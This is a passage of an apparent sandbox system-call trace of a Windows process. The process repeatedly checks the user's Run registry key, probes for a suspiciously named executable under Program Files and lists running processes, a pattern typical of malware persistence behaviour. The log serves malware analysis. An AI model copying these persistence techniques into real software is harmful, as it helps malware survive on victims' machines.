BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0294.542] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0294.543] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0294.545] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0294.545] NtClose (Handle=0x338) returned 0x0 [0294.545] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0294.545] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0294.545] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deba0) returned 1 [0294.545] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0294.545] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0294.545] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5dec20) returned 1 [0294.545] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0294.546] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0294.549] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0294.549] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0294.549] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0294.690] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0294.691] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0294.692] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0294.694] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0294.694] NtClose (Handle=0x338) returned 0x0 [0294.694] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0294.694] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0294.694] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de920) returned 1 [0294.694] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0294.694] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0294.695] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de3a0) returned 1 [0294.695] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0294.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0294.698] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0294.698] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0294.698] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0294.866] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0294.867] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0294.868] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0294.869] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0294.869] NtClose (Handle=0x338) returned 0x0 [0294.869] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0294.869] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0294.870] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de120) returned 1 [0294.870] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0294.870] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0294.870] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddfa0) returned 1 [0294.870] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0294.870] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0294.874] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0294.874] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0294.875] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0295.015] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0295.016] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0295.018] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0295.020] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0295.020] NtClose (Handle=0x338) returned 0x0 [0295.020] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0295.020] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0295.020] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de520) returned 1 [0295.020] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0295.020] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0295.020] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de120) returned 1 [0295.020] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0295.021] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0295.023] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0295.023] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0295.023] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0295.135] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0295.136] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0295.137] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0295.138] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0295.138] NtClose (Handle=0x338) returned 0x0 [0295.138] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0295.139] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0295.139] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddfa0) returned 1 [0295.139] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0295.139] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0295.139] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5dde20) returned 1 [0295.139] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0295.139] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0295.141] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0295.141] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0295.141] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0295.265] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0295.266] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0295.268] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0295.269] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0295.269] NtClose (Handle=0x338) returned 0x0 [0295.269] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0295.269] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0295.269] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de4a0) returned 1 [0295.269] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0295.269] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0295.269] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deaa0) returned 1 [0295.269] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0295.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0295.273] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0295.273] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0295.273] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0295.414] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0295.418] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0295.419] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0295.421] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0295.421] NtClose (Handle=0x338) returned 0x0 [0295.421] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0295.421] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0295.422] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5dde20) returned 1 [0295.422] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0295.422] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, 